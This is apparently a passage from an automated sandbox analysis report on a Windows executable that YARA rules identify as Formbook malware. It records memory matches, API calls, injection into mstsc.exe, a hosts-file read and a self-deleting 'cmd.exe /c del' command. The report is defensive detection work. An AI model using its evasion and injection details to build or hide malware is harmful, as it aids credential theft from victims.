          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004181B0 NtCreateFile,4_2_004181B0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00418260 NtReadFile,4_2_00418260
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004182E0 NtClose,4_2_004182E0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,4_2_00418390
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004182AC NtReadFile,4_2_004182AC
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,4_2_0041838B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk,21_2_04AF9860
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9840 NtDelayExecution,LdrInitializeThunk,21_2_04AF9840
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF99A0 NtCreateSection,LdrInitializeThunk,21_2_04AF99A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF95D0 NtClose,LdrInitializeThunk,21_2_04AF95D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_04AF9910
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9540 NtReadFile,LdrInitializeThunk,21_2_04AF9540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,21_2_04AF96E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF96D0 NtCreateKey,LdrInitializeThunk,21_2_04AF96D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_04AF9660
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A50 NtCreateFile,LdrInitializeThunk,21_2_04AF9A50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9650 NtQueryValueKey,LdrInitializeThunk,21_2_04AF9650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk,21_2_04AF9780
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk,21_2_04AF9FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk,21_2_04AF9710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF98A0 NtWriteVirtualMemory,21_2_04AF98A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF98F0 NtReadVirtualMemory,21_2_04AF98F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9820 NtEnumerateKey,21_2_04AF9820
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFB040 NtSuspendThread,21_2_04AFB040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF95F0 NtQueryInformationFile,21_2_04AF95F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF99D0 NtCreateProcessEx,21_2_04AF99D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9520 NtWaitForSingleObject,21_2_04AF9520
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFAD30 NtSetContextThread,21_2_04AFAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9560 NtWriteFile,21_2_04AF9560
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9950 NtQueueApcThread,21_2_04AF9950
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A80 NtOpenDirectoryObject,21_2_04AF9A80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A20 NtResumeThread,21_2_04AF9A20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A00 NtProtectVirtualMemory,21_2_04AF9A00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A10 NtQuerySection,21_2_04AF9A10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9610 NtEnumerateValueKey,21_2_04AF9610
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9670 NtQueryInformationProcess,21_2_04AF9670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF97A0 NtUnmapViewOfSection,21_2_04AF97A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA3B0 NtGetContextThread,21_2_04AFA3B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9730 NtQueryVirtualMemory,21_2_04AF9730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9B00 NtSetValueKey,21_2_04AF9B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA710 NtOpenProcessToken,21_2_04AFA710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9760 NtOpenProcess,21_2_04AF9760
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9770 NtSetInformationFile,21_2_04AF9770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA770 NtOpenThread,21_2_04AFA770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007081B0 NtCreateFile,21_2_007081B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_00708260 NtReadFile,21_2_00708260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007082E0 NtClose,21_2_007082E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_00708390 NtAllocateVirtualMemory,21_2_00708390
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007082AC NtReadFile,21_2_007082AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070838B NtAllocateVirtualMemory,21_2_0070838B
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B6730_2_0054B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010804180_2_01080418
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010826300_2_01082630
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010804080_2_01080408
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010800130_2_01080013
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010800400_2_01080040
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EC27C0_2_010EC27C
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EEC480_2_010EEC48
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EEC580_2_010EEC58
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B6C00_2_0054B6C0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B8B14_2_0041B8B1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B9634_2_0041B963
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00408C4B4_2_00408C4B
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00408C504_2_00408C50
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B4934_2_0041B493
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B4964_2_0041B496
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041C5394_2_0041C539
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041CE854_2_0041CE85
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041BF124_2_0041BF12
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041C7954_2_0041C795
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B6734_2_00A7B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B6C04_2_00A7B6C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A021_2_04AE20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B820A821_2_04B820A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB09021_2_04ACB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC841F21_2_04AC841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B7100221_2_04B71002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE258121_2_04AE2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACD5E021_2_04ACD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB0D2021_2_04AB0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD412021_2_04AD4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABF90021_2_04ABF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82D0721_2_04B82D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B81D5521_2_04B81D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B822AE21_2_04B822AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82EF721_2_04B82EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD6E3021_2_04AD6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEEBB021_2_04AEEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B81FF121_2_04B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82B2821_2_04B82B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B8B121_2_0070B8B1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B95421_2_0070B954
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F8C4B21_2_006F8C4B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F8C5021_2_006F8C50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B49321_2_0070B493
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B49621_2_0070B496
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070C53921_2_0070C539
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2D8921_2_006F2D89
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2D9021_2_006F2D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070CE8521_2_0070CE85
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070BF1221_2_0070BF12
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2FB021_2_006F2FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070C79521_2_0070C795
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04ABB150 appears 35 times
          Source: JFBlvEr5H9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: JFBlvEr5H9.exe, 00000000.00000002.259012000.0000000002AC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.257828156.000000000064A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.275089237.0000000006FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000000.256995077.0000000000B7A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.357592649.0000000003783000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.356712545.00000000018CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exeBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@6/3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01
          Source: JFBlvEr5H9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: JFBlvEr5H9.exeVirustotal: Detection: 20%
          Source: JFBlvEr5H9.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exeJump to behavior
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: JFBlvEr5H9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: JFBlvEr5H9.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: JFBlvEr5H9.exeStatic file information: File size 1336832 > 1048576
          Source: JFBlvEr5H9.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x107000
          Source: JFBlvEr5H9.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C9C6 push es; ret 0_2_0054CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; retf 0001h0_2_0054C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; ret 0_2_0054CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; retn 0001h0_2_0054CBA3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; iretd 0_2_0054C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; retf 0_2_0054C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; retf 0001h0_2_0054C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C836 push es; retf 0_2_0054C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B6C0 push es; iretd 0_2_0054C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B2A2 push cs; ret 4_2_0041B2A3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3FB push eax; ret 4_2_0041B462
